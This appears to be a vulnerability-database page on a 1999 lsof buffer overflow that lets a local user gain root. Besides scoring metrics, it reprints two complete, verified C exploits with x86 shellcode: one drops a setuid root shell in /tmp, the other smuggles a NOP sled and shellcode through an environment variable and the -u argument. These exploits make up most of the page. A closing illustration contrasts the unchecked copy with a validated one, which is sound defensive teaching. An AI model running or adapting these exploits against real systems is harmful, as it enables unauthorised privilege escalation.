Metrics
Metrics | Score | Severity | CVSS Vector | Source
V2 | 7.2 | High | AV:L/AC:L/Au:N/C:C/I:C/A:C | [email protected]
The v2 vector decodes as local access, low attack complexity, no authentication required, and complete confidentiality, integrity and availability impact, which matches a local user gaining root through a setuid binary.
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0% to 100%). The higher the score, the greater the probability that the vulnerability will be exploited in the wild.
EPSS Percentile
The percentile ranks CVEs by their EPSS score. For example, a CVE in the 95th percentile has a higher EPSS score than 95% of all other CVEs. The percentile is therefore the number to use when comparing one CVE's exploitation likelihood against the rest of the population, whereas the raw score is the absolute probability.
Exploit information
Exploit Database EDB-ID : 19373
Publication date : 1999-02-16 23h00 +00:00
Author : c0nd0r
EDB Verified : Yes
// source: https://www.securityfocus.com/bid/496/info
//
// Lsof is an open file management utility included with many Linux distributions. When run setuid root or setgid kmem, it is subject to a buffer overflow that can lead to regular users gaining root privileges.
//
/*
 * Sekure SDI (Brazilian Information Security Team)
 * lsof local exploit for linux
 * by c0nd0r <[email protected]>
 *
 * Security problem found by HERT. (www.hert.org)
 *
 * -> This little tool will bring you a suid or sgid shell owned by lsof
 * user (root|kmem usually) at /tmp directory (/tmp/sh).
 *
 * -----------------------------------------------------------------------
 * Code explanation: We've used an unusual technique here.
 * The buffer allocated was too small for the standard expl, so we did a
 * little trick, by overflowing with 'A' till reaching the ret address and
 * then we've filled with NOP and the shellcode just after the modified
 * ret address. So we have a different exploit architecture:
 * [garbage][eip modified][lotsa NOP's][shellcode]
 * That's why we need a bigger offset.
 * -----------------------------------------------------------------------
 *
 * usage ( needa have a little brain):
 * ./SDI-lsof <offset> (between 373-505)
 *
 * 4 phun - http://www.sekure.org
 * Thanks to jamez, dumped, bishop, bahamas, slide, falcon, vader
 * and guys at #uground (irc.brasnet.org network)
 *
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* change the lsof path if it's needed */
#define PATH "/usr/bin/lsof"

/* execve("/bin/sh", ["/bin/sh", "-c", "cp /bin/sh /tmp/sh; chmod 6755 /tmp/sh"], NULL)
 * followed by exit(); the command string is appended to the code bytes and
 * patched in place at run time. */
char shellcode[] =
"\xeb\x31\x5e\x89\x76\x32\x8d\x5e\x08\x89\x5e\x36"
"\x8d\x5e\x0b\x89\x5e\x3a\x31\xc0\x88\x46\x07\x88"
"\x46\x0a\x88\x46\x31\x89\x46\x3e\xb0\x0b\x89\xf3"
"\x8d\x4e\x32\x8d\x56\x3e\xcd\x80\x31\xdb\x89\xd8"
"\x40\xcd\x80\xe8\xca\xff\xff\xff/bin/sh -c cp /bin/sh /tmp/sh; chmod 6755 /tmp/sh";

/* Returns the current stack pointer. Relies on 32-bit x86, gcc and no
 * optimisation: whatever is left in %eax becomes the return value.
 * Build with: gcc -m32 -O0 -fno-stack-protector */
unsigned long getsp(void) {
    __asm__("mov %esp,%eax");
}

int main(int argc, char *argv[]) {
    char b00m[220];
    long addr;
    int x, y, offset = 380;

    if (argc > 1) offset = atoi(argv[1]);

    /* [garbage]: 16 bytes of filler up to the saved return address */
    for (x = 0; x < 16; x++)
        b00m[x] = 'A';

    /* [eip modified]: guessed address, written little-endian, that must
     * land inside the NOP sled that follows it */
    addr = getsp() + offset;
    printf("SDI-lsof exploiting at 0x%lx\n", addr);
    b00m[x++] = addr & 0x000000ff;
    b00m[x++] = (addr & 0x0000ff00) >> 8;
    b00m[x++] = (addr & 0x00ff0000) >> 16;
    b00m[x++] = (addr & 0xff000000) >> 24;

    /* [lotsa NOP's]: sled from byte 20 up to byte 99 */
    for ( ; x < 100; x++)
        b00m[x] = 0x90;

    /* [shellcode]: placed after the overwritten return address */
    for (y = 0; y < strlen(shellcode); y++, x++)
        b00m[x] = shellcode[y];
    /* terminate right after the shellcode (the original did
     * b00m[strlen(b00m)] = '\0' on a buffer that was not yet terminated) */
    b00m[x] = '\0';

    printf("\nFind a suid shell at /tmp/sh...\n\n");
    /* the whole payload is handed to lsof as the -u (login name) argument */
    execl(PATH, PATH, "-u", b00m, (char *)0);
    perror("execl");
    return 1;
}
Exploit Database EDB-ID : 19374
Publication date : 1999-02-16 23h00 +00:00
Author : Zhodiac
EDB Verified : Yes
// source: https://www.securityfocus.com/bid/496/info
//
// Lsof is an open file management utility included with many Linux distributions. When run setuid root or setgid kmem, it is subject to a buffer overflow that can lead to regular users gaining root privileges.
/* http://www.hackersnetwork.net! */
/*
 * Xploit for lsof 4.0.4 by Zhodiac <[email protected]>
 * Based on Aleph's article in phrack49
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define DEFAULT_OFFSET 0
#define DEFAULT_BUFFER_SIZE 32
#define DEFAULT_EGG_SIZE 2048
#define NOP 0x90

/* execve("/bin/sh", ["/bin/sh"], NULL) followed by exit(): the classic
 * Phrack 49 Linux/x86 shellcode */
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";

/* Returns the current stack pointer. Relies on 32-bit x86, gcc and no
 * optimisation: whatever is left in %eax becomes the return value.
 * Build with: gcc -m32 -O0 */
unsigned long get_esp(void) {
    __asm__("movl %esp,%eax");
}

int main(int argc, char *argv[]) {
    char *buff, *ptr, *egg;
    long *addr_ptr, addr;
    int offset = DEFAULT_OFFSET, bsize = DEFAULT_BUFFER_SIZE;
    int i, eggsize = DEFAULT_EGG_SIZE;
    char comando[512];

    /* ./xploit [buffer size] [offset] [egg size] */
    if (argc > 1) bsize = atoi(argv[1]);
    if (argc > 2) offset = atoi(argv[2]);
    if (argc > 3) eggsize = atoi(argv[3]);

    printf("\nXploit for lsof 4.04 by zhodiac <[email protected]>\n\n");

    if (!(buff = malloc(bsize))) {
        printf("Can't allocate memory.\n");
        exit(0);
    }
    if (!(egg = malloc(eggsize))) {
        printf("Can't allocate memory.\n");
        exit(0);
    }

    addr = get_esp() - offset;
    printf("Using address: 0x%lx\n", addr);

    /* buff becomes the -u argument: nothing but the guessed address,
     * repeated, so wherever the saved return address falls inside the
     * overflowed buffer it is overwritten with addr */
    ptr = buff;
    addr_ptr = (long *) ptr;
    for (i = 0; i < bsize; i += 4)
        *(addr_ptr++) = addr;

    /* the egg is a NOP sled followed by the shellcode, passed to lsof in
     * its environment as EGG=...; addr has to land somewhere in the sled */
    ptr = egg;
    for (i = 0; i < eggsize - strlen(shellcode) - 1; i++)
        *(ptr++) = NOP;
    for (i = 0; i < strlen(shellcode); i++)
        *(ptr++) = shellcode[i];

    buff[bsize - 1] = '\0';
    egg[eggsize - 1] = '\0';

    memcpy(egg, "EGG=", 4);
    putenv(egg);
    snprintf(comando, 511, "lsof -u %s", buff);
    system(comando);
    return 0;
}
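Neither exploit shows the lsof code that overflows; both only depend on the -u (login name) argument being copied into a fixed-size stack buffer without a length check. The block below is an added illustration for this page, not lsof's source, of that bug class beside the check that closes it. The buffer size LNAME_MAX, the fake_frame layout, the function names and the 199-byte sample argument are all assumptions made for the example.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Assumed for illustration: the page does not state the size of the
 * buffer lsof 4.0.4 overflowed. */
#define LNAME_MAX 32

/* Stand-in for the stack frame of the function that handled -u: the
 * undersized buffer with something important sitting right above it. */
struct fake_frame {
    char lname[LNAME_MAX];
    unsigned long saved_ret;
};

/* Vulnerable pattern (the 'before'): the -u argument is copied with no
 * length check.  Written as one memcpy over the whole frame, capped at the
 * frame size, so the overwrite is observable and this demo does not crash;
 * a real strcpy() keeps going and corrupts the return address the same way. */
unsigned long vuln_copy_user(const char *arg)
{
    struct fake_frame f;
    size_t n = strlen(arg) + 1;

    f.saved_ret = 0xdeadbeefUL;
    if (n > sizeof f)
        n = sizeof f;
    memcpy(&f, arg, n);          /* more than LNAME_MAX bytes spill into saved_ret */
    return f.saved_ret;
}

/* Hardened version: validate and length-check the login name before any
 * byte is copied.  Returns 0 and fills out[] on success, -1 otherwise. */
int safe_copy_user(const char *arg, char *out, size_t outsz)
{
    size_t n = strlen(arg);
    size_t i;

    /* Reject, do not truncate: a silently shortened name could match a
     * different account than the one the caller asked for. */
    if (n == 0 || n >= outsz)
        return -1;

    /* Only characters that occur in login names; this also keeps NOP
     * sleds and shellcode bytes from ever reaching the buffer. */
    for (i = 0; i < n; i++) {
        unsigned char c = (unsigned char)arg[i];
        if (!isalnum(c) && c != '_' && c != '-' && c != '.')
            return -1;
    }
    memcpy(out, arg, n + 1);
    return 0;
}

/* 1 if the hardened path accepts arg, 0 if it rejects it. */
int user_arg_accepted(const char *arg)
{
    char out[LNAME_MAX];
    return safe_copy_user(arg, out, sizeof out) == 0;
}

/* Constructed input: 199 'A's, the length class of the -u argument the
 * exploits above send (they use addresses and NOPs instead of 'A'). */
const char *overlong_arg(void)
{
    static char buf[200];
    memset(buf, 'A', sizeof buf - 1);
    buf[sizeof buf - 1] = '\0';
    return buf;
}

int main(void)
{
    printf("vuln_copy_user(\"root\")     -> saved_ret 0x%lx\n", vuln_copy_user("root"));
    printf("vuln_copy_user(overlong)   -> saved_ret 0x%lx\n", vuln_copy_user(overlong_arg()));
    printf("safe_copy_user(\"root\")     -> %s\n", user_arg_accepted("root") ? "accepted" : "rejected");
    printf("safe_copy_user(overlong)   -> %s\n", user_arg_accepted(overlong_arg()) ? "accepted" : "rejected");
    printf("safe_copy_user(\"ro\\x90ot\") -> %s\n", user_arg_accepted("ro\x90ot") ? "accepted" : "rejected");
    return 0;
}
```

With the overlong argument the vulnerable copy leaves saved_ret full of 0x41 bytes, which is the same condition both exploits exploit with a chosen address instead of 'A'. The hardened path rejects the name outright; it does not truncate, because for a lookup key truncation is its own bug.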
Products Mentioned
Configuration 0
Debian>>Debian_linux >> Version 2.0
Debian>>Debian_linux >> Version 2.0.5
Freebsd>>Freebsd >> Version 2.0
Freebsd>>Freebsd >> Version 2.0.5
Freebsd>>Freebsd >> Version 2.1.0
Freebsd>>Freebsd >> Version 2.1.5
Freebsd>>Freebsd >> Version 2.1.6
Freebsd>>Freebsd >> Version 2.1.7.1
Freebsd>>Freebsd >> Version 2.2.2
Freebsd>>Freebsd >> Version 2.2.3
Freebsd>>Freebsd >> Version 2.2.4
Freebsd>>Freebsd >> Version 2.2.5
Freebsd>>Freebsd >> Version 2.2.6
Freebsd>>Freebsd >> Version 2.2.8
Freebsd>>Freebsd >> Version 3.0
Freebsd>>Freebsd >> Version 3.1
Freebsd>>Freebsd >> Version 3.2
Redhat>>Linux >> Version 5.2
Suse>>Suse_linux >> Version 4.2
Suse>>Suse_linux >> Version 4.3
Suse>>Suse_linux >> Version 4.4
Suse>>Suse_linux >> Version 4.4.1
Suse>>Suse_linux >> Version 5.0
Suse>>Suse_linux >> Version 5.1
Suse>>Suse_linux >> Version 5.2
Suse>>Suse_linux >> Version 5.3
Suse>>Suse_linux >> Version 6.0
Suse>>Suse_linux >> Version 6.1
References